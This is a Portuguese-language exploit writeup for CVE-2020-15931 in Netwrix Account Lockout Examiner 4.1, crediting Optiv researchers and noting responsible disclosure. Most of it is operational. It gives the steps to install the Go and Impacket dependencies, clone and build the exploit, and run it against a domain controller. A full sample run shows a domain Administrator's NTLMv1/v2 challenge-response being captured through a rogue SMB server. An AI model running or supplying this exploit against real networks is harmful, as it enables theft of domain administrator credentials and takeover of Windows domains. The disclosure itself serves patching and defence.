
Netwrix Account Lockout Examiner 4.1 Vulnerabilidade de Divulgação de Credenciais de Conta de Administrador de Domínio
O Netwrix Account Lockout Examiner (ALE) anterior à versão 5.1 permite que um adversário remoto não autenticado acione uma conexão com um sistema controlado pelo atacante e capture a resposta ao desafio NTLMv1/v2 de uma conta com privilégios de administrador de domínio. A conta de administrador de domínio já estaria configurada no produto, conforme exigido para a instalação. Um adversário pode explorar isso gerando um único evento Kerberos Pre-Authentication Failed (ID do Evento 4771) em um controlador de domínio.
Mais detalhes sobre a vulnerabilidade podem ser encontrados no seguinte Blog

A vulnerabilidade foi descoberta em ambiente real por Robert Surace (@robsauce) e Daniel Min (@bigb0ss), consultores de segurança da Optiv, durante uma avaliação de segurança. Após a identificação da CVE-2020-15931, a Optiv contatou imediatamente a Netwrix para divulgar a falha identificada de forma responsável.
O script do exploit foi desenvolvido em golang. Instale as seguintes dependências:
go get github.com/fatih/color
go get github.com/ropnop/gokrb5/client
go get github.com/ropnop/gokrb5/config
Ele também utiliza o smbserver.py do Impacket.
pip install impacket
Por fim, baixe o script do exploit e compile-o.
git clone https://github.com/optiv/CVE-2020-15931
go build cve-2020-15931.go
$ ./cve-2020-15931
_______ ________ ___ ___ ___ ___ __ _____ ___ ____ __
/ ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ | ____/ _ \___ \/_ |
| | \ \ / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
| | \ \/ / | __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
| |____ \ / | |____ / /_| |_| / /_| |_| | | |___) | / /___) || |
\_____| \/ |______| |____|\___/____|\___/ |_|____/ /_/|____/ |_|
[robSauce & bigb0ss] v1.0
[+] Netwrix Account Lockout Examiner 4.1 Exploit Script
Required:
-d Domain name
-dc Domain controller
-u Valid username
Optional:
-h Print this help menu
Example:
./cve-2020-15931 -d target.com -dc 10.10.0.2 -u jsmith
(Nota: No momento em que este texto foi escrito, este ataque só pode ser identificado por meio de um ataque cego. Isso porque é difícil determinar se a organização alvo está usando o Netwrix Account Lockout Examiner em sua rede para auditar autenticações de contas ou não.)
$ ./cve-2020-15931 -d bosslab.com -dc 10.10.0.2 -u b0ss1
_______ ________ ___ ___ ___ ___ __ _____ ___ ____ __
/ ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ | ____/ _ \___ \/_ |
| | \ \ / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
| | \ \/ / | __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
| |____ \ / | |____ / /_| |_| / /_| |_| | | |___) | / /___) || |
\_____| \/ |______| |____|\___/____|\___/ |_|____/ /_/|____/ |_|
[robSauce & bigb0ss] v1.0
[+] Netwrix Account Lockout Examiner 4.1 Exploit Script
[+] DC: 10.10.0.2
[+] Domain: bosslab.com
[+] Username: b0ss1
[+] Password: wrongPass
[+] Event ID 4771 (Kerberos Pre-Authentication Failed) Triggered!
[+] If vulnerable, you will get a NTLMv1/2 of the Netwrix service account.
[+] SMB Server Started...
Impacket v0.9.22.dev1+20200607.100119.b5c61678 - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.0.2,59264)
[*] AUTHENTICATE_MESSAGE(BOSSLAB\Administrator,BOSSLAB-DC01)
[*] User BOSSLAB-DC01\Administrator authenticated successfully
[*] Administrator::BOSSLAB:17dcc32c6eafc48d:f798e7c906eb1b639722614f1417ded1:0101000000000000be18...REDACTED...0000000
[*] Disconnecting Share(1:IPC$)
[*] Closing down connection (10.10.0.2,59264)
[*] Remaining connections []
Netwrix Account Lockout Examiner 5.1
Event ID 4771
Impacket smbserver.py
Gokrb5 Client
CVE-2020-15931